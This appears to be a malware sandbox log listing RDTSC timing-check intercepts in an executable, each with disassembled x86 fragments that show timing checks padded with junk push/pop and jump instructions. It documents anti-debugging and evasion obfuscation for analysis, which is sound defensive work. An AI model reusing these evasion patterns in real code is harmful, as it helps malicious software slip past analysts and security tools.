Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9CD3 second address: 96DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 add dword ptr [esp], 30D845EBh 0x0000000d mov edx, dword ptr [ebp+122D2A29h] 0x00000013 push dword ptr [ebp+122D1595h] 0x00000019 mov si, cx 0x0000001c call dword ptr [ebp+122D3589h] 0x00000022 pushad 0x00000023 jng 00007F0AD95F882Ch 0x00000029 xor eax, eax 0x0000002b jmp 00007F0AD95F882Eh 0x00000030 add dword ptr [ebp+122D34B1h], ebx 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a or dword ptr [ebp+122D34B1h], ebx 0x00000040 add dword ptr [ebp+122D34B1h], edi 0x00000046 mov dword ptr [ebp+122D29C9h], eax 0x0000004c mov dword ptr [ebp+122D34B1h], edi 0x00000052 mov esi, 0000003Ch 0x00000057 mov dword ptr [ebp+122D2E75h], edx 0x0000005d add esi, dword ptr [esp+24h] 0x00000061 jg 00007F0AD95F8827h 0x00000067 lodsw 0x00000069 jmp 00007F0AD95F8832h 0x0000006e add eax, dword ptr [esp+24h] 0x00000072 jmp 00007F0AD95F882Eh 0x00000077 mov ebx, dword ptr [esp+24h] 0x0000007b mov dword ptr [ebp+122D34B1h], edi 0x00000081 push eax 0x00000082 pushad 0x00000083 push esi 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D01 second address: AE9D07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D07 second address: AE9D53 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c or ecx, dword ptr [ebp+122D2C21h] 0x00000012 push 00000000h 0x00000014 mov dx, di 0x00000017 call 00007F0AD95F8829h 0x0000001c jnp 00007F0AD95F8832h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D53 second address: AE9D57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9D57 second address: AE9DA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F0AD95F8837h 0x0000000c pop ebx 0x0000000d popad 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push esi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 pop edi 0x00000017 pop esi 0x00000018 mov eax, dword ptr [eax] 0x0000001a jmp 00007F0AD95F8830h 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 jns 00007F0AD95F8826h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9DA1 second address: AE9DBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9DBE second address: AE9E47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b mov esi, 72B4BA4Bh 0x00000010 mov dword ptr [ebp+122D37E6h], ecx 0x00000016 push 00000003h 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F0AD95F8828h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 je 00007F0AD95F882Ch 0x00000038 mov dword ptr [ebp+122D274Fh], edx 0x0000003e push 00000000h 0x00000040 or edi, dword ptr [ebp+122D2A5Dh] 0x00000046 push 00000003h 0x00000048 jmp 00007F0AD95F8837h 0x0000004d call 00007F0AD95F8829h 0x00000052 jmp 00007F0AD95F8831h 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9E47 second address: AE9E4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9E4B second address: AE9EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 pushad 0x00000012 jmp 00007F0AD95F882Fh 0x00000017 push edi 0x00000018 push edi 0x00000019 pop edi 0x0000001a pop edi 0x0000001b popad 0x0000001c mov eax, dword ptr [eax] 0x0000001e jno 00007F0AD95F8840h 0x00000024 mov dword ptr [esp+04h], eax 0x00000028 push eax 0x00000029 push edx 0x0000002a jo 00007F0AD95F882Ch 0x00000030 jg 00007F0AD95F8826h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9EA5 second address: AE9EAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9EAB second address: AE9EAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AE9EAF second address: AE9ED6 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d mov dword ptr [ebp+122D1B3Dh], ebx 0x00000013 lea ebx, dword ptr [ebp+1244FC0Ch] 0x00000019 add dword ptr [ebp+122D27BEh], edx 0x0000001f mov edi, edx 0x00000021 push eax 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA089 second address: AEA08D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA08D second address: AEA091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: AEA19C second address: AEA1E9 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 22BA316Ah 0x00000012 push 00000000h 0x00000014 push esi 0x00000015 call 00007F0AD95F8828h 0x0000001a pop esi 0x0000001b mov dword ptr [esp+04h], esi 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc esi 0x00000028 push esi 0x00000029 ret 0x0000002a pop esi 0x0000002b ret 0x0000002c mov cx, B331h 0x00000030 lea ebx, dword ptr [ebp+1244FC20h] 0x00000036 add edi, 067E2900h 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jnp 00007F0AD95F8828h 0x00000045 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0992B second address: B09931 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09AA9 second address: B09ADA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F0AD95F8830h 0x0000000a jmp 00007F0AD95F8835h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09ADA second address: B09AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 ja 00007F0AD8C6A9BEh 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09AF2 second address: B09B02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09EE9 second address: B09EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B09EED second address: B09F0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0AD95F8826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F0AD95F8833h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A06F second address: B0A093 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jns 00007F0AD8C6A9B6h 0x00000011 jmp 00007F0AD8C6A9BDh 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1D5 second address: B0A1DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1DB second address: B0A1DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1DF second address: B0A1E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A1E5 second address: B0A202 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A202 second address: B0A24D instructions: 0x00000000 rdtsc 0x00000002 js 00007F0AD95F8826h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F0AD95F882Dh 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jmp 00007F0AD95F882Ah 0x0000001a jmp 00007F0AD95F882Ch 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F0AD95F8833h 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A24D second address: B0A251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A251 second address: B0A255 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A255 second address: B0A25B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A25B second address: B0A279 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 jo 00007F0AD95F883Ch 0x0000000c jmp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A3AE second address: B0A3D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F0AD8C6A9C5h 0x0000000b jmp 00007F0AD8C6A9BDh 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A70D second address: B0A736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F0AD95F8836h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A898 second address: B0A8AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jl 00007F0AD8C6A9B6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8AB second address: B0A8BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0AD95F882Ch 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8BC second address: B0A8D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8D0 second address: B0A8D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8D6 second address: B0A8DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0A8DA second address: B0A8E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B239 second address: B0B23D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B3C8 second address: B0B3DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8831h 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B3DF second address: B0B3F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B51D second address: B0B53D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F0AD95F8836h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B53D second address: B0B55A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0AD8C6A9C5h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B0B86C second address: B0B870 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B165D0 second address: B16601 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9BFh 0x00000007 jmp 00007F0AD8C6A9C0h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jmp 00007F0AD8C6A9BEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B168B7 second address: B168BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16B33 second address: B16B47 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0AD8C6A9B8h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16DCA second address: B16DE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F0AD95F8826h 0x00000009 jnl 00007F0AD95F8826h 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 je 00007F0AD95F882Eh 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16DE4 second address: B16DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jbe 00007F0AD8C6A9F1h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16DF8 second address: B16E0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Ch 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B16E0E second address: B16E12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18F7D second address: B18F87 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B18F87 second address: B18FCD instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0AD8C6A9B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jp 00007F0AD8C6A9CAh 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 push ebx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007F0AD8C6A9BEh 0x0000001e popad 0x0000001f pop ebx 0x00000020 mov eax, dword ptr [eax] 0x00000022 push edi 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 pop eax 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193B5 second address: B193BF instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0AD95F8826h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193BF second address: B193CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0AD8C6A9BCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193CF second address: B193D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B193D3 second address: B193E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19C01 second address: B19C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B19C09 second address: B19C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A0AF second address: B1A0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8837h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jnp 00007F0AD95F8830h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A13F second address: B1A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F0AD8C6A9B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A1C7 second address: B1A1D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F882Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A63E second address: B1A67A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD8C6A9C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c add esi, dword ptr [ebp+122D3580h] 0x00000012 push 00000000h 0x00000014 ja 00007F0AD8C6A9BCh 0x0000001a push 00000000h 0x0000001c add esi, dword ptr [ebp+122D2D45h] 0x00000022 push eax 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A67A second address: B1A67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1A67E second address: B1A684 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AF82 second address: B1AF9A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0AD95F8834h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1AF9A second address: B1AFB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0AD8C6A9C4h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1C0AC second address: B1C129 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 ja 00007F0AD95F8826h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F0AD95F8828h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 push 00000000h 0x00000029 jmp 00007F0AD95F8837h 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push ebp 0x00000033 call 00007F0AD95F8828h 0x00000038 pop ebp 0x00000039 mov dword ptr [esp+04h], ebp 0x0000003d add dword ptr [esp+04h], 00000019h 0x00000045 inc ebp 0x00000046 push ebp 0x00000047 ret 0x00000048 pop ebp 0x00000049 ret 0x0000004a pushad 0x0000004b mov dword ptr [ebp+1244EE55h], edi 0x00000051 popad 0x00000052 xchg eax, ebx 0x00000053 pushad 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5DF second address: B1D5E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D2F8 second address: B1D317 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F0AD95F8834h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5E3 second address: B1D5E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5E9 second address: B1D5EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B1D5EF second address: B1D5F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21DEE second address: B21DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B21DF2 second address: B21DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B22EB3 second address: B22EBD instructions: 0x00000000 rdtsc 0x00000002 je 00007F0AD95F882Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B22EBD second address: B22ED2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jl 00007F0AD8C6A9C2h 0x0000000d jbe 00007F0AD8C6A9BCh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B2403A second address: B24056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F0AD95F8826h 0x0000000a popad 0x0000000b pop ebx 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F0AD95F8826h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: B24056 second address: B2405A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
